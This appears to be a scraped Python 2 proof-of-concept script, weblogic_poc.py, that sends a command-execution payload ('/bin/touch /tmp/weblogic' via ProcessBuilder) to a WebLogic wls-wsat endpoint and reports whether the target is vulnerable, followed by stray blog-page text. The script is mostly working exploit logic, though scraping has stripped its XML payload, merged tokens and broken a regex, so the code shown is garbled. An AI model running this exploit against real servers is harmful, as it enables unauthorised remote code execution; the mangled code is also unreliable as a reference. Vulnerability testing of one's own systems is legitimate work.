#!/usr/bin/env python#coding:utf-8#@Date : 2017/12/22 17:11#@File : weblogic_poc.py#@Author : sevck#@Link : http://www.qingteng.cn#-------------------------------------------------------------------------
importrequestsimportrefrom sys importargv
heads={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','Content-Type': 'text/xml;charset=UTF-8'}defpoc(url):if not url.startswith("http"):
url= "http://" +urlif "/" inurl:
url+= '/wls-wsat/CoordinatorPortType'post_str= '''
/bin/touch
/tmp/weblogic
'''
try:
response= requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
response=response.text
response= re.search(r"\.*\", response).group(0)exceptException, e:
response= ""
if 'java.lang.ProcessBuilder' in response or "0" inresponse:
result= "Vulnerability"
returnresultelse:
result= "No Vulnerability"
returnresultif __name__ == '__main__':if len(argv) == 1:print "python weblogic_poc.py url:port"exit(0)else:
url= argv[1]
result= poc(url=url)print result
扫一扫
3511
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
